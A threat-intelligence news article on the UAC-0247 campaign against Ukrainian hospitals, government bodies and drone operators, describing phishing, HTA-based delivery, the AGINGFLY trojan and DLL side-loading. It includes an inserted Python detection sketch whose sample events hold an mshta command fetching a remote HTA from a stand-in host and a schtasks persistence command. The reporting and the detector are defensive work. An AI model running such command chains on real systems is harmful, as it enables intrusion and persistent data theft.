UAC-0247 Attacks Hospitals, Governments to Steal Browser, WhatsApp Data


Jennifer sherman
April 16, 2026 2 Min Read

Key Takeaways

  • The threat group UAC-0247 has been observed since early 2026, targeting government entities and hospitals, as well as Ukrainian defense personnel.
  • The attackers employ sophisticated spear-phishing tactics, often leveraging themes of humanitarian aid or software updates, to deliver malware.
  • The primary objective is the exfiltration of sensitive data from web browsers and WhatsApp, alongside extensive network reconnaissance.
  • A key component of their arsenal is the AGINGFLY remote access trojan, which dynamically compiles command handlers on infected systems.

UAC-0247 Targets Critical Sectors with Advanced Data Theft Campaign

A persistent threat cluster, identified as UAC-0247, has been actively engaged in cyber espionage since early 2026, according to a detailed report. The group has systematically targeted critical infrastructure, including government agencies and hospitals, with a focus on stealing sensitive data from internet browsers and WhatsApp applications. Beyond data exfiltration, UAC-0247 demonstrates a capability for lateral movement and network expansion within compromised environments, as documented in that report.

Initial Infiltration Tactics

The campaign typically begins with highly deceptive spear-phishing emails. These messages are crafted to appear as discussions about humanitarian aid, urging recipients to click on a malicious link. To enhance credibility, attackers either construct convincing fake websites using AI tools or redirect victims to legitimate third-party sites that have Cross-Site Scripting (XSS) vulnerabilities. Upon clicking the link, a malicious archive file is downloaded to the target’s system. Opening this archive executes a shortcut file, which then leverages the standard HTA file processing utility to retrieve and run a remote HTA file. This process often includes a decoy form to distract the user while, in the background, an executable file is dropped and launched via a scheduled task.
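A detection sketch for the chain described above, added here as an example and not taken from the CERT-UA report: it correlates process-creation events to find an HTA host process fetching a remote file and a descendant registering a scheduled task. It assumes the "standard HTA file processing utility" is `mshta.exe` and that the task is registered with `schtasks.exe` (the article does not say how); the event field names and all sample events are constructed.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation events (Sysmon Event ID 1 style); field names are hypothetical.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://files.example.invalid/form.hta"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks /create /tn "Updater" /tr C:\Users\Public\upd.exe /sc minute'},
    # Benign look-alikes: a local HTA and a read-only task query.
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Tools\inventory.hta"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": "schtasks /query"},
]

REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
TASK_CREATE = re.compile(r"/create\b", re.IGNORECASE)

def descendants(events, root_pid):
    """Return every event whose ancestry leads back to root_pid."""
    children = {}
    for ev in events:
        children.setdefault(ev["ppid"], []).append(ev)
    found, stack, seen = [], [root_pid], {root_pid}
    while stack:
        for child in children.get(stack.pop(), []):
            if child["pid"] not in seen:  # guard against pid loops in bad data
                seen.add(child["pid"])
                found.append(child)
                stack.append(child["pid"])
    return found

def find_hta_chains(events):
    """Flag mshta.exe runs with a remote URL; severity is high if a descendant creates a task."""
    findings = []
    for ev in events:
        url = REMOTE_URL.search(ev["cmd"])
        if basename(ev["image"]).lower() != "mshta.exe" or not url:
            continue
        tasks = [d["cmd"] for d in descendants(events, ev["pid"])
                 if basename(d["image"]).lower() == "schtasks.exe"
                 and TASK_CREATE.search(d["cmd"])]
        findings.append({"pid": ev["pid"], "url": url.group(0),
                         "severity": "high" if tasks else "medium", "task_cmds": tasks})
    return findings

if __name__ == "__main__":
    for finding in find_hta_chains(SAMPLE_EVENTS):
        print(finding)
```

A remote-URL `mshta.exe` launch alone is reported at medium severity, so the rule still fires when the task is registered by some other means.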

Analysts at CERT-UA have extensively documented this activity, noting a surge in attacks during March and April 2026. The same group has also broadened its scope to include Ukrainian Defense Forces personnel and FPV drone operators. A notable incident on March 10, 2026, involved the distribution of “bachu.zip” via the Signal messenger, masquerading as an update for the “BACHU” software used by FPV operators. This archive contained a DLL file designed to launch the AGINGFLY malware through a DLL side-loading technique upon execution of the primary program. More information can be found in the linked report.
